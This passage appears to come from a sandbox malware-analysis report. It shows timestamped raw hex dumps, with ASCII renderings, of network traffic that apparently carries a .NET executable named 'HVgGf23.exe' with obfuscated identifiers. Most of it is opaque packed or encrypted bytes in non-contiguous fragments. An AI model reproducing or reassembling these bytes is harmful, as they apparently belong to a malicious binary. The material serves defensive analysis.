                                                                          2023-01-30 12:39:17 UTC31INData Raw: 63 62 33 2d 63 64 63 38 2d 34 37 66 62 2d 39 32 35 63 2d 34 37 37 38 35 36 35 36 36 66 34 66 00 48 56 67 47 66 32 33 2e 65 78 65 00 3c 4d 6f 64 75 6c 65 3e 00 55 46 62 4e 52 57 6d 39 53 41 48 45 67 52 47 4d 74 41 00 78 4e 6a 4a 50 77 61 4d 52 50 73 52 4e 44 64 70 51 35 00 4f 62 6a 65 63 74 00 52 65 73 6f 75 72 63 65 73 00 48 56 67 47 66 32 33 2e 50 72 6f 70 65 72 74 69 65 73 00 53 65 74 74 69 6e 67 73 00 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 74 74 69 6e 67 73 42 61 73 65 00 53 79 73 74 65 6d 2e 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 00 4d 4a 43 4b 56 4b 4c 55 49 4f 52 00 68 31 6e 4e 78 63 78 62 71 31 49 47 77 30 72 76 6e 4a 00 4d 75 6c 74 69 63 61 73 74 44 65 6c 65 67 61 74 65 00 69 32 43 59 6a 45 30 4d 75 59 79 51 36 47 6b 4b 73 4c 00 49 62 70 68 48 70
                                                                          Data Ascii: cb3-cdc8-47fb-925c-477856566f4fHVgGf23.exe<Module>UFbNRWm9SAHEgRGMtAxNjJPwaMRPsRNDdpQ5ObjectResourcesHVgGf23.PropertiesSettingsApplicationSettingsBaseSystem.ConfigurationMJCKVKLUIORh1nNxcxbq1IGw0rvnJMulticastDelegatei2CYjE0MuYyQ6GkKsLIbphHp
                                                                          2023-01-30 12:39:17 UTC39INData Raw: 08 09 09 09 08 1d 05 1d 05 08 09 1d 05 09 1d 05 09 12 81 21 09 0e 0e 08 12 81 25 09 08 1d 05 08 12 81 29 08 0b 08 1d 05 1d 05 09 08 08 06 20 01 01 12 81 2d 0c 20 03 01 12 81 2d 12 81 29 11 81 31 04 00 01 0e 0e 04 07 01 1d 05 03 20 00 0e 05 00 00 12 81 35 07 20 03 0e 1d 05 08 08 07 07 02 1d 12 75 1d 1c 09 20 02 12 80 d1 0e 1d 12 75 06 20 02 1c 1c 1d 1c 04 00 01 1c 1c 03 07 01 1c 04 00 01 02 0e 05 20 00 12 81 3d 04 20 00 12 75 06 20 01 12 81 41 0e 0b 07 06 1d 05 12 81 45 08 0a 08 08 0d 20 04 01 0e 11 81 49 11 81 4d 11 81 51 03 20 00 0a 07 20 03 08 1d 05 08 08 0d 07 04 12 81 25 12 80 fd 12 81 1d 1d 05 05 20 01 01 1d 05 05 20 00 12 81 29 07 20 03 01 1d 05 08 08 04 20 00 1d 05 0b 07 06 0e 1d 05 1d 05 1d 05 08 08 0c 07 07 0e 1d 05 1d 05 1d 05 08 08 08 07 07 03
                                                                          Data Ascii: !%) - -)1 5 u u = u AE IMQ % )
                                                                          2023-01-30 12:39:17 UTC47INData Raw: a1 32 99 2a 72 44 0f 34 52 5e fa f9 bd f4 d4 91 3a 5f 57 15 b5 f3 4d 6d ed 84 3b 3e d8 07 a5 56 81 5c 11 67 75 9b 70 ac ab 7e 51 8d 12 58 14 4f 40 bb 60 74 07 7c d4 37 a5 b4 0f 36 b0 09 51 91 b1 48 01 dc 98 7b 0e 0c a6 6b 86 b4 de d7 84 4f 33 88 ea 5b 86 ee 74 81 6c 4e eb 67 9b 5d 24 ef 87 61 60 ec 14 02 5e bf bc 29 ba 36 20 b9 ff dd 9d 6b d1 e9 2f 59 da 15 26 a7 db cf f8 6e 35 1b b6 c0 5b 47 37 45 c5 b4 19 a3 a2 49 32 22 96 4e da 20 a3 67 a9 48 1f 29 3c fc 9a e2 0b 5e ff 4e f5 41 4f 01 59 51 8e fb 4b 5f 41 2a 80 1f 4b b8 10 9b ea b9 f9 67 a7 d4 79 cc a9 e6 05 4e 6a 2d 0b d2 fe 07 b7 d3 d5 c6 65 b8 f4 07 f2 e9 52 33 6c 67 1a ee 8e 4c 48 e1 2d a5 b3 f7 c1 54 10 62 48 fb 0d a8 c7 ab 6d aa 45 0b 44 39 cb 4f be 28 7f 3f 51 d1 8d 88 49 5b 75 e4 97 0e 97 2a 6e
                                                                          Data Ascii: 2*rD4R^:_WMm;>V\gup~QXO@`t|76QH{kO3[tlNg]$a`^)6 k/Y&n5[G7EI2"N gH)<^NAOYQK_A*KgyNj-eR3lgLH-TbHmED9O(?QI[u*n
                                                                          2023-01-30 12:39:17 UTC55INData Raw: 0c 6b 9b 34 86 59 3d 15 6f d4 ef 90 f1 b5 a7 dd a8 db 5e bb 9c 4c c9 c6 29 b3 41 90 a2 9a 28 6d aa 59 4e 3d 35 6c aa 73 ee 01 da ca 9b 36 e5 62 f5 fc bd bf d9 98 e3 75 a3 69 be 99 b7 dc 9d 65 c0 cd 4e f9 c2 54 d3 b0 84 7d a4 b3 0f ce 6c e9 7e 7a 89 b6 46 ec 06 18 af 1b 5e 9d e6 55 c4 f3 1b e2 06 23 60 2a 00 b5 ff 07 1b 34 fa 06 64 8f ad ec 71 87 fb 97 34 6f 75 fa 47 70 e9 b9 7d 3e f0 9e e6 8f 5d 15 29 6f d2 46 ce 4a 7f b9 b4 ae ec 8b be db 1f 34 c8 0d 41 df cd 2c 5a 0f 64 cc c4 c3 8f cb 83 63 e4 de 67 00 87 53 93 69 48 fd fe 8a b1 a2 d7 38 be a3 11 52 95 92 5a 88 24 68 8d 0e 6b dc d9 9f 3f fa 88 43 5e 55 7b a4 ea 49 22 36 cf 19 a1 5b 83 6b ca f1 aa c0 4f 8c f9 b1 0a 04 ac 42 29 c1 04 8f 66 f0 87 c9 d7 05 93 8d 00 61 f2 fe 9e d3 b0 27 76 45 07 c2 cc 95 eb
                                                                          Data Ascii: k4Y=o^L)A(mYN=5ls6buieNT}l~zF^U#`*4dq4ouGp}>])oFJ4A,ZdcgSiH8RZ$hk?C^U{I"6[kOB)fa'vE
                                                                          2023-01-30 12:39:17 UTC63INData Raw: d7 16 83 3d a9 18 41 7d e1 9f 57 f9 68 15 02 0d 36 df 5d 4e f4 ed f1 77 33 f0 fe 92 c0 73 31 e9 f4 62 75 fb a7 57 1e 58 1b 88 50 cc c6 80 e9 67 ed 80 39 78 d7 e7 71 44 bd 4f b2 b7 46 8c 14 04 b8 29 20 c0 27 13 ce fb eb a5 93 4f 7d 24 39 68 e3 89 6c cb a7 45 58 76 ff 39 29 d8 3d a6 05 6f 4d e6 4e 81 12 3d 3b 00 0e 68 49 85 23 fe d1 27 1a d4 51 f4 f2 f0 10 6c 2c 8b 6a cb 3a 98 6b ee ea 47 56 f5 60 ed 4c 0f 81 c2 44 ab aa 4d fd e6 0d 4d 07 29 81 c4 f4 e7 f6 5a 2b 0b c8 8a df ae ba 4e cc 6a 41 a1 cb 55 19 46 19 9d 8c 33 98 5d cc cd b4 e6 bb 8d dc 9d f6 a7 1e 5c 7c 98 b7 38 7a 2e 0d f9 79 49 d1 b2 00 6f 81 48 c0 39 2d 7b c0 ae 18 bb 90 1b 5c 65 d9 53 b6 a2 b7 c5 10 08 a8 1d 76 79 0c ae 9a de d6 ee 0d 3f 5c 32 d3 f0 28 bd 80 31 da 95 34 a1 af aa 93 c2 0d 11 5c
                                                                          Data Ascii: =A}Wh6]Nw3s1buWXPg9xqDOF) 'O}$9hlEXv9)=oMN=;hI#'Ql,j:kGV`LDMM)Z+NjAUF3]\|8z.yIoH9-{\eSvy?\2(14\
                                                                          2023-01-30 12:39:17 UTC70INData Raw: 99 77 56 64 4e 20 00 1b 2f bd 0b 19 b0 0e d6 58 40 27 15 42 cb 21 7b f7 04 7f 7b d3 f8 93 5b 18 e9 21 f4 db 73 e0 33 58 7e 43 6f f1 59 ca 40 61 2a 19 d8 a4 77 c2 87 eb 77 8d 65 c0 15 e7 6c 0c fc e6 ed dd 62 4f fc b4 20 f2 6c 4e 84 aa fa 07 a6 92 43 d9 b8 94 f2 5b f2 61 c5 fd a0 6a 66 f7 ab 51 91 8e 8a 17 10 b1 fc c6 c7 ba a1 9e 0d a1 e5 ae 04 f6 3a fd bd 88 85 d6 0c 13 78 e0 f3 8c 83 fe aa 3d a8 6a 7c 8d b5 a7 fe 01 2c e4 98 ec 6f e0 aa 49 22 08 41 71 f9 cb 04 55 50 52 9d 52 e6 16 3c bf 3f ba ff 12 52 5f 08 62 ef 20 de 6e c4 ae 51 b4 39 cc d4 fe 5f 29 43 97 3b bb 9c 1e 89 fc e6 b9 16 12 23 5e d8 b0 f0 6f 60 fc 8f df a1 fe f3 83 0f d4 52 77 f3 a5 e4 b5 d3 31 97 e2 7a 42 a4 bc 0d 7d 11 b4 ba 72 53 ed ad e9 67 3a 0c de c0 63 ab 2b aa 5a ec 74 77 10 44 00 97
                                                                          Data Ascii: wVdN /X@'B!{{[!s3X~CoY@a*wwelbO lNC[ajfQ:x=j|,oI"AqUPRR<?R_b nQ9_)C;#^o`Rw1zB}rSg:c+ZtwD
                                                                          2023-01-30 12:39:17 UTC78INData Raw: 31 3f 64 9c 7e 2f 3a bb d4 34 61 85 0e 29 01 11 14 67 4a 94 f7 44 17 4f f1 d1 91 4c cf aa 8b b8 8f bb ab a8 e0 fd dd be 03 fe a9 11 72 01 14 b0 18 f0 b9 71 8f 5b b9 b3 ba 3d 16 19 1d ea 2d 5c 43 14 85 67 c9 6a 13 b8 0f b7 3d e6 73 a9 c6 09 4a 8b 20 0c 60 38 8f c7 3a 8f 05 fa 5b 9f a3 6d 5a d4 fc af 9a f2 03 7e 3b 0f 69 4e b0 d3 62 b9 f0 70 e9 59 9f 9a 61 48 eb 58 c3 a9 cf 1f 57 7a bc dc d4 39 76 5b 5d 27 12 16 a7 27 78 88 34 8e 74 1b 45 a3 59 3e f2 ba ae be 9a 60 63 05 d8 33 61 0a 6e e0 79 91 82 e2 3b e6 0c 7e ac d8 ec 52 b9 19 00 62 42 5b 63 34 fb 17 3a fa f4 3c 0a 5d 71 3d 4d 3d c0 0b 40 2b 9e 49 8d 76 d1 15 ee 38 b0 a1 0f 28 cf 9e 18 75 c4 5f 66 84 eb 5b f7 66 2a 6c ef a2 d2 0d c8 16 1c 96 bc 75 6c 1a 5f 8d 79 e5 99 88 80 fe 5b a0 37 36 28 b9 89 d4 e3
                                                                          Data Ascii: 1?d~/:4a)gJDOLrq[=-\Cgj=sJ `8:[mZ~;iNbpYaHXWz9v[]''x4tEY>`c3any;~RbB[c4:<]q=M=@+Iv8(u_f[f*lul_y[76(
                                                                          2023-01-30 12:39:17 UTC86INData Raw: 4f 19 08 a8 92 0f 30 f0 b0 25 5d 67 fb c3 ba 21 2b c3 91 b3 80 8c 9f 55 2d 37 1a e3 32 90 b0 ca 9b 96 7a 96 0b ff a5 ac 6b 9f 3e 4d 74 37 d7 9a 84 33 72 5e f1 75 79 97 3f 4c d6 15 56 f5 72 40 aa f2 92 db 36 44 f2 36 fa 63 a5 21 e7 bc f1 33 12 04 34 04 69 1b 27 14 7e 86 d6 4f 6c bd ca 91 54 03 6d cb 46 a5 25 d9 b2 7b ff de 93 5b 8b cf d4 4d 08 51 2b fe 39 00 65 4e b6 77 ed f5 a6 77 fa bd 8d b5 d2 d4 8f d1 7a f7 d9 44 34 22 b7 37 93 e6 34 7a cd 30 66 b8 9d 73 8f 01 17 b5 2a a5 15 31 2f d4 f5 d3 ba e4 41 1b 97 a9 43 a7 fb be f6 52 c2 b7 31 77 42 16 cc 8d aa be 3a cb 65 ed 6b 91 ae 81 a7 58 ae db 10 ed 9c 23 00 71 e6 d8 d7 60 4d 14 5c 5c ca 6a fb 2c 47 4f a6 6c 4d 35 c5 90 56 cb 85 5c e5 c8 b5 48 13 37 b3 51 05 bb be c2 52 7a 42 bb b6 17 33 86 73 3f 2b 3d ff
                                                                          Data Ascii: O0%]g!+U-72zk>Mt73r^uy?LVr@6D6c!34i'~OlTmF%{[MQ+9eNwwzD4"74z0fs*1/ACR1wB:ekX#q`M\\j,GOlM5V\H7QRzB3s?+=
                                                                          2023-01-30 12:39:17 UTC94INData Raw: af ae a7 43 54 65 56 66 d1 ce e9 0e b9 14 4f 3c 75 11 71 f9 48 f7 cb e8 03 cb 68 d3 33 8c 69 96 13 0e 49 dd 14 bf 7d e2 d7 70 97 a6 ff b3 e6 62 9a 43 4b c5 78 85 4e 18 f3 67 c8 af 15 79 23 c2 c1 7a 67 92 70 5e 3a 55 28 77 fa 0d e1 7c 4e 42 95 d8 f6 3f 4c fd 1f 5b 80 3f c8 e0 fd 17 56 25 cf 41 a7 a9 92 5e 87 f3 e0 65 24 4e 67 30 ac 87 69 22 f8 2c 72 84 c8 20 34 a6 b9 44 4f 0f 59 18 cd 18 2b a5 61 95 da be f1 83 ab 43 7a b5 08 bd d3 38 81 51 b2 65 9c cf ad 10 e3 ba 33 f9 31 31 40 21 0a bf a1 6f 3e f9 90 03 96 e9 82 fe 6a f5 e9 54 cb 4e 86 45 1b 5e 4b f7 16 cc b0 ad 1c 11 a7 80 76 21 1c ed 0d de a9 ff 64 bd be 70 0f 61 05 1e 56 d0 ad ab 00 17 cc df 0d 90 93 e9 f4 7b 67 89 00 a2 9c 2e 28 a8 17 cf 59 5e 0b 9a 8a 0f b6 93 77 52 23 38 3c e1 7e e5 4d 7f 9c b8 67
                                                                          Data Ascii: CTeVfO<uqHh3iI}pbCKxNgy#zgp^:U(w|NB?L[?V%A^e$Ng0i",r 4DOY+aCz8Qe311@!o>jTNE^Kv!dpaV{g.(Y^wR#8<~Mg
                                                                          2023-01-30 12:39:17 UTC102INData Raw: ab da f9 68 3b 3c 41 a3 bb 60 5b 2c e8 91 07 1a a0 ff 19 23 12 ef 72 9b 1a f7 4c 74 64 92 c0 18 5b 53 3e 71 8a ec d6 ed 2e 7c bf c7 ca 68 bb 2b bf be fb 3a 52 53 b3 e2 b8 97 a0 3e 2f 7c c9 cd cb 42 4c 96 d9 a0 e3 a5 47 da 73 0d 06 76 33 49 55 d8 90 92 a6 66 fa 56 b8 6d 56 93 3a 2d 93 5b 55 15 17 83 3f fb dc 42 de af 6a 7d 06 68 02 b6 61 ff 18 d2 cc cf a5 d4 81 2a 1e 4f 00 12 0d 51 e5 f5 08 d0 32 cf 1e 3f f5 7b 5e a0 12 e6 10 47 c1 30 62 9c cb c1 ff a2 9d d5 11 17 74 d7 ad 2a 1d 3f 52 e4 8c 4b 60 7d 42 72 e3 a2 af cb ee b3 3d 53 ee 6b cf a9 30 d9 5a 6f d4 c6 27 2d fc 47 d1 12 f7 fb 4c 06 8e b9 85 4e d1 e2 03 0e a7 3c 74 1f 10 68 f5 42 36 17 9f 00 37 1d 54 68 f2 15 ba bc 25 76 24 1c cc 33 93 d6 3f c3 35 1e 63 4a 72 cd 45 1f e7 d6 22 23 de 40 08 a5 e2 ba 01
                                                                          Data Ascii: h;<A`[,#rLtd[S>q.|h+:RS>/|BLGsv3IUfVmV:-[U?Bj}ha*OQ2?{^G0bt*?RK`}Br=Sk0Zo'-GLN<thB67Th%v$3?5cJrE"#@
                                                                          2023-01-30 12:39:17 UTC109INData Raw: aa ac 5c 1b b7 56 5a fb 93 cc ba 6f 3a fb 92 f4 1f f9 fd dc 7a 63 8d 29 80 d4 90 2c 50 e3 11 27 8a 31 00 f2 a9 ed 63 17 4e 85 d1 35 0b a6 b8 04 40 1b a8 50 6c 1b 59 2d c2 b4 74 f4 81 e5 74 fe f6 22 7b ff 9e 9e 3d e5 c9 b0 97 4c e3 46 56 24 aa 0a b1 9d 41 6a 94 b6 fa de b4 d5 9b 06 ea 26 ea 99 77 06 92 f5 6b ef d9 1c 69 d1 76 b5 24 97 dd 0c 00 9d b2 91 ce 61 45 18 91 2d 80 d0 ba 82 fa da 17 5b 51 56 d9 c2 90 06 ec 0d 03 eb a4 3a 2e 87 6d 0d 80 d9 f9 eb b2 f1 36 02 ce 6c e7 25 87 a6 3d 82 c3 de 2b e8 7b 4e 97 21 a7 7b a7 9f c5 f9 55 3b dd 96 99 79 80 be cb c3 03 1b 8e a8 58 af a8 15 63 db f5 20 1c fe b6 93 9b 07 cc 9e 61 bf 3a 69 8b 91 a1 1d 8c 57 e7 d6 3a b6 10 83 a6 7f 09 b9 70 34 0c c2 20 59 81 63 99 10 5f 10 f0 a1 51 27 de 70 12 2e fd f4 45 a6 bb 85 c1
                                                                          Data Ascii: \VZo:zc),P'1cN5@PlY-tt"{=LFV$Aj&wkiv$aE-[QV:.m6l%=+{N!{U;yXc a:iW:p4 Yc_Q'p.E
                                                                          2023-01-30 12:39:17 UTC117INData Raw: 84 bd 60 05 74 e6 9c 7a 53 95 77 ad c8 52 2d 9a 91 c5 b0 0f 90 26 15 00 7d 87 3a ab 91 a3 e0 2f 7e 8c 58 44 31 bc ec 39 fc d8 49 11 f1 0b fa 16 bd c5 06 26 8f bb 03 c0 ac 8e 52 5a 93 d0 c0 41 06 8c d5 4e bd 78 2e f8 85 08 88 c5 66 02 9d 60 c8 89 0c 7e 8d c3 67 c6 df 0a 00 55 c5 31 47 0f 9a c5 eb f2 99 59 8c 9a e9 5e 3e 63 db 88 52 36 4a 45 e2 97 03 08 d4 0d ba b8 c9 53 03 c2 6b 00 3b db 5e 0b ef 42 7d cf e2 be 91 a6 36 e9 6a b2 7e 88 58 cc c4 a1 c5 f9 cb cc 08 17 ec ba 91 04 8f 12 45 0b a3 5f 22 5c 10 a0 da cb c6 d5 16 26 4f c0 64 08 d7 ef fa 40 70 f7 c5 fe 6f ac e6 77 92 d1 d6 ba 31 b6 45 f1 4a 81 f4 27 ec 88 97 e8 90 aa a6 af 9c 34 cd fd 6d 15 4a fe 42 59 c6 f1 7d 70 86 7a 56 b6 15 f5 3e 75 a6 b3 15 0a 6e 42 92 83 9d b1 e1 68 d5 54 8a ec 10 cb db 14 88
                                                                          Data Ascii: `tzSwR-&}:/~XD19I&RZANx.f`~gU1GY^>cR6JESk;^B}6j~XE_"\&Od@pow1EJ'4mJBY}pzV>unBhT
                                                                          2023-01-30 12:39:17 UTC125INData Raw: 92 b4 d6 5a 4a 1b 01 35 d9 84 95 c2 85 39 31 2a a1 c4 63 56 25 53 00 c8 63 23 bb 33 65 d2 09 47 12 13 7c 8a 39 44 41 e1 f3 b8 4e 1f ea bd fc 14 b2 93 12 f6 8e d1 c8 56 e9 2c b4 56 22 86 e5 57 60 0b a2 7c 61 3c d7 7e b0 3d a0 b3 a8 29 59 67 32 19 b0 2a eb 49 b3 9f a9 3b 77 d8 d8 fd db 75 9e de c6 34 ed 71 74 c1 e8 a6 ec 33 ae 5b 7f b1 10 07 d2 7f 45 ed fb 1a 2d 5b ff 7c 76 b5 29 87 98 18 66 79 82 ef 80 0c 3a d6 b1 78 df 26 a6 44 20 73 22 40 88 23 76 8e df b1 26 1e 59 79 e7 5f c9 3b 69 bc 3e db 6c fc 8d f9 7a 60 53 8b 1d 2e 09 58 99 14 8a cd 10 b5 10 76 d1 7d 20 09 80 f4 6e 11 87 4f 4d 05 81 04 e7 7f c2 67 62 50 12 43 b0 c1 32 1e dc 84 65 25 47 98 80 97 ec 2e 7e e3 de c5 23 c9 73 ab fb c1 39 39 49 99 3c f6 c2 25 03 40 e8 e7 04 ed a3 d0 a7 a6 7b 02 9b 1e c4
                                                                          Data Ascii: ZJ591*cV%Sc#3eG|9DANV,V"W`|a<~=)Yg2*I;wu4qt3[E-[|v)fy:x&D s"@#v&Yy_;i>lz`S.Xv} nOMgbPC2e%G.~#s99I<%@{
                                                                          2023-01-30 12:39:17 UTC133INData Raw: 74 28 f1 80 25 37 00 2a c5 26 93 f8 3c b9 b4 e7 1f 7b 83 40 eb 91 2a f1 33 ad 78 2c 4d a4 4b 8b 7c 6b c2 11 2d 4b f3 fc f7 fa c9 b3 3c 94 db 63 be c4 ff 03 37 12 3a 43 56 82 d1 37 23 b3 18 81 bb 47 04 f5 2c bf cf d0 c7 1b bf 6e a7 f6 2f ba f1 55 ad e7 a9 b8 2e 9d 4b 3a bb e4 b7 75 5c 52 cb 0b 4f 79 66 81 5d 76 5e 21 92 a4 c8 76 57 12 08 6a 05 03 49 98 d2 35 dd 88 20 e8 3b 73 30 84 8c 4f 20 89 23 7c bd d8 7c 5a 22 b8 ae 24 72 24 ee 5a 7f 30 7a 5c 03 d4 c9 a2 24 f1 28 38 fe f0 27 3d 8f c7 f2 35 e9 62 2b 47 c7 14 cd 4f bc a0 31 39 03 52 1a 68 eb 46 1a 24 12 71 df 78 0e ff 41 0d 5f fe 2b b8 fc 10 ae 56 24 d3 0f 26 d3 f7 b5 51 71 f2 45 ef a5 97 34 5d 30 9f 6a 20 ae 7a cc 26 e7 ba 09 79 99 a0 be 84 f1 bd 77 02 a6 0b 58 b1 99 5e 45 b6 22 ad da 53 16 8a 05 50 59
                                                                          Data Ascii: t(%7*&<{@*3x,MK|k-K<c7:CV7#G,n/U.K:u\ROyf]v^!vWjI5 ;s0O #||Z"$r$Z0z\$(8'=5b+GO19RhF$qxA_+V$&QqE4]0j z&ywX^E"SPY
                                                                          2023-01-30 12:39:17 UTC141INData Raw: 65 6b 4b 26 51 bd 54 1e 58 78 3a 0c 61 06 4c de 49 85 76 e5 1e 1a 2b d5 15 cc 09 5b 27 2b 0f db b7 39 61 24 4c f3 fe bf 77 08 b3 d7 37 07 d3 33 76 04 a8 02 8f 07 ae 01 e8 64 c4 62 5a bf a6 ff 25 2a b8 2c b1 15 95 d3 64 73 f8 c6 8d 50 f0 25 47 99 05 df 49 41 2b 7e fa 62 91 55 0f 19 bd 49 a2 c0 07 43 c6 3f 4b f1 d3 35 06 d4 cd 25 ce a9 40 bc ff 6c 71 eb 5b c7 e6 e0 7c a7 fc df 85 ca f3 db fb f5 79 87 7a 7c 6e 36 93 84 4c cb 1f 03 fa 6a 32 e5 c2 31 40 44 ce 5c 15 ab 85 35 d3 ff 31 ca 7f 20 c8 3c 61 b0 6a 83 87 66 a7 bd b7 c4 c8 5e 39 80 a5 fb 52 94 a8 82 8d 13 e4 35 03 64 a5 ac e3 5d 0b fb 7b 13 48 6d d4 0b 6c 22 92 88 77 e2 60 1b 9e b4 d3 30 e8 15 11 bc 8b 00 5f cd 5d d5 b5 3a ac ca b1 32 6f 03 c8 b8 85 21 02 a4 db 08 d6 d5 dc 55 ba 4d 4b a7 aa 61 94 b6 6a
                                                                          Data Ascii: ekK&QTXx:aLIv+['+9a$Lw73vdbZ%*,dsP%GIA+~bUIC?K5%@lq[|yz|n6Lj21@D\51 <ajf^9R5d]{Hml"w`0_]:2o!UMKaj
                                                                          2023-01-30 12:39:17 UTC148INData Raw: 2f 4a b2 ad c9 2c 39 0b aa e4 9f 87 26 8c de bb dd c9 3e 54 19 08 dc 66 83 8d 60 73 51 78 2a 28 dd 0d 26 20 51 be e0 38 6f 7a e1 c5 33 38 11 4c c4 54 76 dc be b1 1f 2d 23 45 0b 65 23 20 c2 b4 5e 05 d8 4c 7a 42 4d ba 60 ea fe 8a b1 fd 5b 03 fa 0a 6b b4 cf 69 37 32 ac 45 87 fc a5 8c ce 92 5e 68 3c 41 7f 22 ea 0f 7d 08 30 3f 42 c3 ac a6 a2 1f f8 11 76 d3 c5 72 10 bc 22 32 2f ff 01 20 a7 3e 0c 12 32 9e c6 20 06 6f 76 0e 1b a0 20 59 44 9b 01 30 a3 63 09 ee 66 b8 6d a0 a0 ca 8d aa 94 24 f2 06 b6 38 81 86 98 ae 91 0f a9 9c 96 71 90 77 85 b3 4b 9c 06 a7 bb c6 c1 37 c6 09 95 a2 31 a2 9b 87 6f cc e4 6f dd 27 d6 c6 b5 4c c8 c0 94 e1 62 86 39 a5 28 a9 33 3b 22 7f 22 ee ad 59 51 ea 0b b5 8d ab a2 7a 60 3d d7 e4 b5 cb e1 5c 1a 4c 96 9e ea 73 bc f5 49 4b 90 d2 87 2b c3
                                                                          Data Ascii: /J,9&>Tf`sQx*(& Q8oz38LTv-#Ee# ^LzBM`[ki72E^h<A"}0?Bvr"2/ >2 ov YD0cfm$8qwK71oo'Lb9(3;""YQz`=\LsIK+
                                                                          2023-01-30 12:39:17 UTC156INData Raw: e6 3f a6 e2 81 d5 e5 ad 12 2d 22 cd a6 54 ab ae 96 2d 74 81 d1 3c ee 3b f4 78 bf 65 5b 3a 3a 05 af 48 b3 d6 39 2a 45 3d c9 52 92 62 8d 3c 33 5d fc 81 4c 3b 8c 5e 54 f3 2a e5 bb b7 3e 33 f8 87 fd 7d 46 e9 0c 1d bf 0b ae 06 a5 c0 7b d9 64 e3 b9 dc 8d e4 7e 91 8b 5f e1 2a 51 7d 24 cb 28 a6 c1 4b 29 a2 a0 16 42 53 d8 f8 b2 a7 20 28 73 d8 e7 df f5 41 f9 03 c0 e8 f4 85 00 73 45 1e 19 96 eb 90 66 19 82 70 b9 e3 63 57 bf ea 42 ff 7b 3d 2c dd 0d 98 90 75 45 a9 65 d3 6d 3c fc f0 cd c3 0c 5d 4b 30 3b 1e 3d e8 0a e0 76 d3 92 36 13 2c 48 19 f2 f0 18 86 2a 00 f4 36 fa af 4a fd 46 44 46 26 45 11 e0 9b 74 f9 46 03 85 98 15 1f 88 1b 3c 65 b9 31 06 39 10 35 15 c7 18 43 17 bd 35 59 3e 17 b8 bc e5 89 7b e3 00 2a 9a 32 41 02 3b 1d b5 fb 52 18 28 a0 e6 66 b8 5c e6 12 4c 39 43
                                                                          Data Ascii: ?-"T-t<;xe[::H9*E=Rb<3]L;^T*>3}F{d~_*Q}$(K)BS (sAsEfpcWB{=,uEem<]K0;=v6,H*6JFDF&EtF<e195C5Y>{*2A;R(f\L9C
                                                                          2023-01-30 12:39:17 UTC164INData Raw: 86 f2 0c bd 7d 32 27 1a 7d 81 db 16 de 65 ba 83 40 9b 5d 7a 0a c7 3f bf 14 78 11 83 55 43 b9 6f 46 0f c1 4b 44 58 00 81 12 8e 0e 6a 67 1b 1b 2a 68 be d2 38 72 f3 0b 8a 97 52 07 e6 5f 1a c4 00 35 b4 9c 2f 21 5b 66 1d e6 52 79 ce 3f 63 2d 05 8b 6e b0 36 80 a6 c2 db 4e f8 0a b5 0b a5 da 2b 82 7d 6f 09 c3 20 4c 53 e8 25 21 a0 20 d2 cb 07 e2 6c 81 98 44 13 91 10 7b 8a 51 af 5c dc ce 7f 60 80 9a 0a 07 4c 42 13 f4 a2 c1 63 0d 15 4d 1e 5c bd 64 6a 0b 20 fb c7 f0 25 74 0a 3b 71 1b fa d4 4c 1f 4b c7 ae f1 c4 02 1d 60 17 ac 7b 78 21 03 00 66 10 3b 81 e6 5b 23 52 4c 0e 62 f4 a7 05 7a 0b 68 79 5b cb ca 0e 05 ab 06 cd 89 13 96 92 aa 21 dc 1c 10 8e 5c b3 9c 95 a4 fc 63 67 e6 fb 71 82 57 65 1c 05 5f 3c 50 ca 3d 46 2f 07 25 3e a4 93 aa fa 04 16 24 f7 b8 e7 95 56 1a 87 c4
                                                                          Data Ascii: }2'}e@]z?xUCoFKDXjg*h8rR_5/![fRy?c-n6N+}o LS%! lD{Q\`LBcM\dj %t;qLK`{x!f;[#RLbzhy[!\cgqWe_<P=F/%>$V
                                                                          2023-01-30 12:39:17 UTC172INData Raw: 97 87 14 c4 bf 2e 6f a0 ed 65 00 32 29 8c 1a b6 57 3b fa 40 8a e1 5e 9f 02 a1 fa 4c 54 6c ed d0 49 ed 9e 78 c2 9a 34 e7 73 17 8c 0b 7f 74 58 6d 79 e7 e0 5c a1 cc 1a a3 d1 85 f5 e9 59 34 f7 4d 8b 5d 77 c8 f0 78 2a 0b 69 50 d1 39 81 01 95 5b 76 19 59 ed 69 72 be 51 f2 0b f0 8c 7b 4a a4 32 91 67 23 aa c1 46 80 f5 7e 95 5b 4a 5e b1 4f bf 4f c1 cb 9c 7c 64 fc ca 2c e0 27 51 e6 a2 3a 28 3d 36 58 a6 ae 89 14 15 9b ef aa 9f 4c bb 83 86 32 a6 fc e4 fc a1 82 a1 62 3f 90 c8 b4 e4 2e b8 4e f9 d2 32 b3 1d ae 89 61 12 24 d9 f8 0d d9 4f 39 a0 bb b8 29 d6 54 19 92 15 3c f2 7d cb ab 3c c7 7a ee d3 17 09 60 88 c2 5e cf 63 67 2b 8e a8 67 53 81 7f ec cf 37 c5 e4 c6 4a 1a 4d 46 7a fb 26 e1 3d 9b 2d 9f 46 ca 88 16 7b e6 84 67 d2 a2 51 62 0f 71 41 6d 9c 0a b3 91 0e a1 a0 b6 07
                                                                          Data Ascii: .oe2)W;@^LTlIx4stXmy\Y4M]wx*iP9[vYirQ{J2g#F~[J^OO|d,'Q:(=6XL2b?.N2a$O9)T<}<z`^cg+gS7JMFz&=-F{gQbqAm
                                                                          2023-01-30 12:39:17 UTC180INData Raw: 2f 10 26 f7 3f 0a 49 53 56 fa 79 d3 a7 7b 3a 58 83 9e 72 e0 9f c4 81 d3 d8 56 0c 90 b0 af 2a ce 36 95 31 07 e6 28 e2 ab bd 4e bf 08 16 b9 a0 5c 72 12 32 dc 59 4c a4 4f 04 13 0b 6b 60 b1 7d 82 e4 7b 0f 86 40 b0 55 6f fc e2 0a 44 86 67 6b a2 92 50 6c ba 84 08 27 78 61 df b5 8d 58 d4 6c 32 35 d9 67 7c d4 f8 8c ce 85 3b fa 72 2b b8 45 09 60 da c6 c2 9c ea f7 84 3d a5 81 26 ee 27 04 5b 8d 4e 66 c5 37 0e 43 68 10 72 5c b4 f2 8b e3 4d 1b 81 3b 82 a7 41 f0 e4 5c 03 1f e8 44 15 3d de f1 13 49 1f c9 94 45 54 c6 19 21 91 bc 54 9f d4 75 f7 a5 dd 40 57 81 56 e1 c7 80 bb bc 6d 1c a3 de ff 67 cc 64 e6 48 fc 5c 06 eb 49 50 bd a9 27 b4 de 56 fd cf 99 36 6c a7 aa 18 0d 54 75 d8 02 cd 02 1f c1 54 d5 09 81 41 76 d0 ba 14 01 07 64 5e cd ee 3f c8 64 e2 56 54 5a 4d cf ba 05 08
